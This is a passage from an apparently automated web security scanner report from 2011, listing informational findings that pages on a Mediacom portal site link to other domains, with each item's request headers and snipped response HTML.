<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/30.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.americanwebinc.com/AW_Flip_Books/Pause/Issue_15/index.html" title="Pause"><img src="/cmsimages/Pause_promo.jpg" alt="Pause" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.16. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=2 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313346697417; dslv=1313346697418; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 19:00:24 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135429
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=3" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;6101b50f;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;a5152b80;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/30.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.mediacomcable.com/internet_security.html" title="CA Internet Security"><img src="/cmsimages/CA_promo.jpg" alt="CA Internet Security" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.17. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=34 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=33
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313402561077; dslv=1313402561078; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 10:31:18 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 133684
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=35" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;adb82fa9;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;4331bba4;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/27.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.18. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=16 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313371142981; dslv=1313371142981; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 01:47:06 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134206
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=17" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;d73f3adc;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;f5a8cb38;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/28.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.19. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=14 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=13
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313367651677; dslv=1313367651678; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 00:49:06 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135229
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=15" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;9a84b3f3;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;0a720b96;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/28.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.americanwebinc.com/AW_Flip_Books/Pause/Issue_15/index.html" title="Pause"><img src="/cmsimages/Pause_promo.jpg" alt="Pause" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.20. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=18 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=17
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313374631782; dslv=1313374631783; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 02:46:09 GMT
Server: Apache
Vary: Accept-Encoding
